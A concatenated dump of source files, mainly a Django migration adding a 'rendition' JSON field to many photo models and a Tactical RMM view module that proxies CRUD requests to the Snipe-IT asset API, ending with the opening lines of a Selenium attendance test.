name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozedescrierebolti',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeelementearhitecturale',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeelementesculptate',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeetapeanterioareinvelitoare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeferestre',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeexteriorcorp',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeinchideretambur',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeinvelitoare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeinvelitoareturle',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeinvelitoareturn',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajexterior',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajperetiinteriori',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajtavanesibolti',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefundatie',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefundatii',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozegeneraleexterior',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozegeneraleinterior',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeicoanevechi',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeiconostas',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeinstalatieelectrica',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeinstalatietermica',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeinvelitoaresarpantasiturn',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozemasaatlar',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozemobilier',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozemobiliere',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeobiectedecult',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeobiectedecultconservare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeobiecteinstrainate',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeochiesi',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeparatraznet',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepardoseliinterioare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepeisagisticasitului',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeperetedespartitor',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepicturaexterioara',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepicturainterioara',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepisanie',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeproscomidie',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozesarpanta',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozesarpantacorpbiserica',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozesit',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozesolee',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozestratpictural',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozestructuracatei',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozestructuracheotoare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozestructuramixt',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozetalpi',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozetamplarii',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeteren',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozetiranti',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeturle',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeturn',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeturnconservare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozevegetatie',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozezonadinjurulbiserici',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
]
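This auto-generated migration repeats the same `AddField` for a nullable `rendition` JSON field across some sixty photo models. If a hand-written variant were ever needed, the operation list could be built in a loop; a sketch (the truncated model-name list and the plain-dict operation shape are illustrative stand-ins, not Django's actual API):

```python
# Illustrative only: dicts stand in for django.db.migrations.AddField instances.
MODEL_NAMES = ["pozeaccese", "pozealtar", "pozeamplasament"]  # truncated for the example

def build_rendition_operations(model_names):
    """One AddField-style spec per model, all adding the same nullable JSON field."""
    return [
        {
            "op": "AddField",
            "model_name": name,
            "name": "rendition",
            "field": "JSONField(blank=True, null=True)",
        }
        for name in model_names
    ]

ops = build_rendition_operations(MODEL_NAMES)
```

In a real migration the loop body would emit `migrations.AddField(...)` objects instead of dicts; the structure is otherwise identical.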
# Source: api/tacticalrmm/integrations/snipeit/views.py (repo: subzdev/tacticalrmm, license: MIT)
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
import requests
import json
from ..models import Integration
class GetHardware(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "hardware?limit=500&offset=0&order=desc&status=" + request.query_params["status"],
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def post(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"requestable": False,
"asset_tag": request.data["asset_tag"],
"status_id": request.data["status_id"],
"model_id": request.data["model_id"],
"name": request.data["name"],
"serial": request.data["serial"],
"rtd_location_id": request.data["rtd_location_id"],
"company_id": request.data["company_id"],
"manufacturer_id": request.data["manufacturer_id"],
"supplier_id": request.data["supplier_id"],
"purchase_cost": request.data["purchase_cost"],
"purchase_date": request.data["purchase_date"],
"warranty_months": request.data["warranty_months"],
"order_number": request.data["order_number"]
}
result = requests.post(
integration.base_url + "hardware",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetAsset(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "hardware/" + asset_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def put(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"requestable": False,
"asset_tag": request.data["asset_tag"],
"status_id": request.data["status_id"],
"model_id": request.data["model_id"],
"name": request.data["name"],
"serial": request.data["serial"],
"rtd_location_id": request.data["rtd_location_id"],
"company_id": request.data["company_id"],
"manufacturer_id": request.data["manufacturer_id"],
"supplier_id": request.data["supplier_id"],
"purchase_cost": request.data["purchase_cost"],
"purchase_date": request.data["purchase_date"],
"warranty_months": request.data["warranty_months"],
"order_number": request.data["order_number"]
}
result = requests.put(
integration.base_url + "hardware/" + asset_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "hardware/" + asset_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetAssetByTag(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, asset_tag, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "hardware/bytag/" + asset_tag,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetAssetCheckout(APIView):
permission_classes = [IsAuthenticated]
def post(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"id": asset_id,
"checkout_to_type": request.data["checkout_to_type"],
"assigned_user": request.data["assigned_user"],
"checkout_at": request.data["checkout_at"],
"expected_checkin": request.data["expected_checkin"],
"note": request.data["note"]
}
result = requests.post(
integration.base_url + "hardware/" + asset_id + "/checkout",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetAssetCheckin(APIView):
permission_classes = [IsAuthenticated]
def post(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"id": asset_id,
"location_id": request.data["location_id"],
"note": request.data["note"]
}
result = requests.post(
integration.base_url + "hardware/" + asset_id + "/checkin",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
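Every view in this module rebuilds the same Snipe-IT header dict inline. A small helper would remove that duplication; a sketch, assuming a module-level function fits this codebase (the name `snipeit_headers` is ours, not from the repo):

```python
def snipeit_headers(api_key: str) -> dict:
    """JSON request headers for the Snipe-IT API, with the key whitespace-trimmed."""
    return {
        "Accept": "application/json",
        "Content-Type": "application/json",
        "Authorization": f"Bearer {api_key.strip()}",
    }
```

Each view could then pass `headers=snipeit_headers(integration.api_key)` instead of repeating the literal dict.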
class GetCompanies(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "companies/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetCompany(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, company_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "companies/" + company_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def patch(self, request, company_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"name": request.data["name"]
}
result = requests.patch(
integration.base_url + "companies/" + company_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, company_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "companies/" + company_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetStatusLabels(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "statuslabels/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetCategories(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "categories/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetModels(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "models/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def post(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"name": request.data["model_name"],
"model_number": request.data["model_number"],
"category_id": request.data["category_id"],
"manufacturer_id": request.data["manufacturer_id"]
}
result = requests.post(
integration.base_url + "models",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetModel(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, model_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "models/" + model_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def put(self, request, model_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"name": request.data["name"],
"model_number": request.data["model_number"],
"category_id": request.data["category_id"],
"manufacturer_id": request.data["manufacturer_id"]
}
result = requests.put(
integration.base_url + "models/" + model_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, model_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "models/" + model_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetManufacturers(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "manufacturers/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetSuppliers(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "suppliers/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetMaintenances(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "maintenances/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def post(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"title": request.data["title"],
"asset_maintenance_type": request.data["asset_maintenance_type"],
"asset_id": request.data["asset_id"],
"supplier_id": request.data["supplier_id"],
"start_date": request.data["start_date"],
"completion_date": request.data["completion_date"],
"cost": request.data["cost"],
"notes": request.data["notes"]
}
result = requests.post(
integration.base_url + "maintenances",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetMaintenance(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, maintenance_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "maintenances/" + maintenance_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def patch(self, request, maintenance_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"title": request.data["title"],
"asset_maintenance_type": request.data["asset_maintenance_type"],
"asset_id": request.data["asset_id"],
"supplier_id": request.data["supplier_id"],
"start_date": request.data["start_date"],
"completion_date": request.data["completion_date"],
"cost": request.data["cost"],
"notes": request.data["notes"]
}
result = requests.patch(
integration.base_url + "maintenances/" + maintenance_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, maintenance_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "maintenances/" + maintenance_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetLocations(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "locations/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetLocation(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, location_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "locations/" + location_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def patch(self, request, location_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"name": request.data["name"]
}
result = requests.patch(
integration.base_url + "locations/" + location_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, location_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "locations/" + location_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetUsers(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "users/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetUser(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, user_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "users/" + user_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def patch(self, request, user_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"first_name": request.data["first_name"],
"last_name": request.data["last_name"],
"jobtitle": request.data["jobtitle"],
"department": request.data["department"]
}
result = requests.patch(
integration.base_url + "users/" + user_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, user_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "users/" + user_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result) | 32.874809 | 117 | 0.559374 | 1,961 | 21,533 | 6.021928 | 0.062213 | 0.086375 | 0.060462 | 0.092133 | 0.927598 | 0.927598 | 0.907698 | 0.905157 | 0.886104 | 0.877128 | 0 | 0.000269 | 0.308364 | 21,533 | 655 | 118 | 32.874809 | 0.792654 | 0 | 0 | 0.777992 | 0 | 0 | 0.248212 | 0.052011 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065637 | false | 0 | 0.011583 | 0 | 0.216216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
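Every view in the file above rebuilds the same three request headers inline. A minimal sketch of how that could be factored into one helper (the function name and its placement are my own, not part of the repo):

```python
def snipeit_headers(api_key):
    """Build the JSON + bearer-token headers repeated in each view above."""
    return {
        "Accept": "application/json",
        "Content-Type": "application/json",
        "Authorization": f"Bearer {api_key.strip()}",
    }
```

Each view could then pass `headers=snipeit_headers(integration.api_key)` instead of restating the dict.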
38c67ac74f14a382596a341d57553383fea6c02b | 175 | py | Python | venv/lib/python2.7/site-packages/pyVim/__init__.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/pyVim/__init__.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/pyVim/__init__.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | null | null | null | ## @file pyVim/__init__.py
## @brief A client-side Python API that wraps pyVmomi.
##
##
##
## @mainpage
##
## A client-side Python API that wraps pyVmomi.
##
##
| 13.461538 | 55 | 0.594286 | 22 | 175 | 4.545455 | 0.636364 | 0.14 | 0.22 | 0.34 | 0.72 | 0.72 | 0.72 | 0.72 | 0 | 0 | 0 | 0 | 0.24 | 175 | 12 | 56 | 14.583333 | 0.75188 | 0.742857 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aa500d5b59f34c1fb0ea84083a46eb518c249a0d | 4,052 | py | Python | guiHandling/animationHandler.py | Mstpyt/Faceit-Overlay | e76165817bc121fbc570edd874a2c117817e7a12 | [
"MIT"
] | 6 | 2021-04-10T13:36:46.000Z | 2021-08-08T17:35:38.000Z | guiHandling/animationHandler.py | kvanja19/Faceit-Overlay | e76165817bc121fbc570edd874a2c117817e7a12 | [
"MIT"
] | 1 | 2021-05-16T17:23:38.000Z | 2021-05-17T19:49:56.000Z | guiHandling/animationHandler.py | kvanja19/Faceit-Overlay | e76165817bc121fbc570edd874a2c117817e7a12 | [
"MIT"
] | 2 | 2021-05-13T06:59:20.000Z | 2021-11-02T10:25:50.000Z | from time import sleep
from dearpygui import core
import logging
import math
""" -------------------------------------------------------------------------------------------------------------------
Animation open Close config
---------------------------------------------------------------------------------------------------------------------"""
def animation_config_color():
    i = 0
    logging.info("start animation config_color")
    conf = core.get_item_configuration("##Config")
    helper = core.get_item_configuration("##Help")
    if helper["show"] is True:
        core.configure_item("##Help", show=False)
        core.configure_item("##Config_Colors", show=True)
        core.configure_item("##Web", show=False)
        return
    if conf["width"] < 350:
        core.configure_item("##Config_Colors", show=True)
        core.configure_item("##Help", show=False)
        core.configure_item("##Web", show=False)
        while i <= 1:
            x_pos = int((1 - math.pow((1 - i), 8)) * 50)
            i += 0.03
            core.configure_item("##Config", x_pos=0, width=380 + x_pos)
            sleep(0.001)
    else:
        core.configure_item("##Config_Colors", show=False)
        core.configure_item("##Help", show=False)
        core.configure_item("##Web", show=False)
        while i <= 1:
            x_pos = int((1 - math.pow((1 - i), 8)) * 50)
            i += 0.03
            core.configure_item("##Config", x_pos=0, width=60 - x_pos)
            sleep(0.001)
    logging.info("end animation config_color")
def animation_config_help():
    logging.info("start animation config_help")
    i = 0
    helper = core.get_item_configuration("##Config")
    conf = core.get_item_configuration("##Config_Colors")
    if conf["show"] is True:
        core.configure_item("##Help", show=True)
        core.configure_item("##Config_Colors", show=False)
        core.configure_item("##Web", show=False)
        return
    if helper["width"] < 350:
        core.configure_item("##Config_Colors", show=False)
        core.configure_item("##Web", show=False)
        core.configure_item("##Help", show=True)
        while i <= 1:
            x_pos = int((1 - math.pow((1 - i), 8)) * 50)
            i += 0.03
            core.configure_item("##Config", x_pos=0, width=380 + x_pos)
            sleep(0.001)
    else:
        core.configure_item("##Config_Colors", show=False)
        core.configure_item("##Help", show=False)
        core.configure_item("##Web", show=False)
        while i <= 1:
            x_pos = int((1 - math.pow((1 - i), 8)) * 50)
            i += 0.03
            core.configure_item("##Config", x_pos=0, width=60 - x_pos)
            sleep(0.001)
    logging.info("end animation config_help")
def animation_config_web():
    logging.info("start animation config_web")
    i = 0
    web = core.get_item_configuration("##Config")
    conf = core.get_item_configuration("##Config_Colors")
    if conf["show"] is True:
        core.configure_item("##Web", show=True)
        core.configure_item("##Config_Colors", show=False)
        core.configure_item("##Help", show=False)
    if web["width"] < 350:
        core.configure_item("##Config_Colors", show=False)
        core.configure_item("##Web", show=True)
        core.configure_item("##Help", show=False)
        while i <= 1:
            x_pos = int((1 - math.pow((1 - i), 8)) * 50)
            i += 0.03
            core.configure_item("##Config", x_pos=0, width=380 + x_pos)
            sleep(0.001)
    else:
        core.configure_item("##Config_Colors", show=False)
        core.configure_item("##Web", show=False)
        core.configure_item("##Help", show=False)
        while i <= 1:
            x_pos = int((1 - math.pow((1 - i), 8)) * 50)
            i += 0.03
            core.configure_item("##Config", x_pos=0, width=60 - x_pos)
            sleep(0.001)
    logging.info("end animation config_web")
| 40.118812 | 121 | 0.52542 | 491 | 4,052 | 4.160896 | 0.099796 | 0.209985 | 0.274596 | 0.168869 | 0.894763 | 0.83162 | 0.81302 | 0.81302 | 0.790504 | 0.787078 | 0 | 0.037678 | 0.272952 | 4,052 | 100 | 122 | 40.52 | 0.655804 | 0 | 0 | 0.766667 | 0 | 0 | 0.144231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.044444 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
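Each animation in the file above steps a progress value `i` by 0.03 per frame and maps it through `1 - (1 - i)^8`, an ease-out curve scaled to a 50 px offset, so the panel moves quickly at first and then settles. A standalone sketch of that easing (the helper name is mine, not from the file):

```python
import math


def ease_out_offset(t, max_offset=50, power=8):
    """Map progress t in [0, 1] to an offset that moves fast early, then settles."""
    return int((1 - math.pow(1 - t, power)) * max_offset)


# Sample the curve the way the while-loops above do (t grows by 0.03 each frame).
frames = [ease_out_offset(0.03 * k) for k in range(34)]
```

The high exponent is what makes the first few frames cover most of the distance.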
aaa8e74495ff0ef878877e6b8abbd1d2316797c2 | 19,335 | py | Python | tests/src/Teacher_Attendance/tar_time_series.py | sreenivas8084/cQube | 3352a13f41679d707979e287d1880f0723b27510 | [
"MIT"
] | null | null | null | tests/src/Teacher_Attendance/tar_time_series.py | sreenivas8084/cQube | 3352a13f41679d707979e287d1880f0723b27510 | [
"MIT"
] | 2 | 2022-02-01T00:55:12.000Z | 2022-03-29T22:29:09.000Z | tests/src/Teacher_Attendance/tar_time_series.py | SreenivasNimmagadda/cQube | 3352a13f41679d707979e287d1880f0723b27510 | [
"MIT"
] | null | null | null | import csv
import os
import re
import time
from selenium.webdriver.support.select import Select
from Data.parameters import Data
from filenames import file_extention
from get_dir import pwd
from reuse_func import GetData
class time_series():
    def __init__(self, driver):
        self.driver = driver
    def check_time_series_dropdown(self):
        self.data = GetData()
        count = 0
